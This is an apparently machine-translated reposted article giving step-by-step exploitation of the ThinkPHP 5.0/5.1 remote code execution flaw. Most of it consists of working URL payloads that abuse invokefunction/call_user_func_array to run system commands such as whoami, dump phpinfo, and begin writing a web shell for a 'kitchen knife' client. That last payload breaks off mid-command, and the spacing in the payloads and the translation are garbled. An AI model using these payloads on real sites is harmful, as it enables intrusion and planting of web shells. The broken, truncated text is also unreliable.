Shulou(Shulou.com)05/31 Report--

This article is about how to achieve ThinkPHP5.0 remote code execution, the editor feels very practical, so share with you to learn, I hope you can learn something after reading this article, say no more, follow the editor to have a look.

ThinkPHP is a popular open source PHP framework in China. There may be remote code execution vulnerabilities in some versions. Attackers can write PHP code to the cache file, resulting in remote code execution. Although there are several prerequisites for exploiting this vulnerability, in view of the large number of domestic sites that use the ThinkPHP framework, the vulnerability still has a certain scope of influence.

Affected versions include 5.0 and 5.1

Download the ThinkPHP5.0.22 version of the source code program, put it in the PHPStudy running directory and visit

1. Add Payload to the back of the URL address for use

Remote command execution of Payload1:system function

? s=index/think\ app/invokefunction&function=call_user_func_array&vars [0] = system&vars [1] [] = whoami

The Payload2:phpinfo function looks at the information of phpinfo ()

? s=index/think\ app/invokefunction&function=call_user_func_array&vars [0] = phpinfo&vars [1] [] = 1

two。 Write shell with Payload and connect with kitchen knife

Payload1: writing to shell

? s=/index/\ think\ app/invokefunction&function=call_user_func_array&vars [0] = system&vars [1] [] = echo ^

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.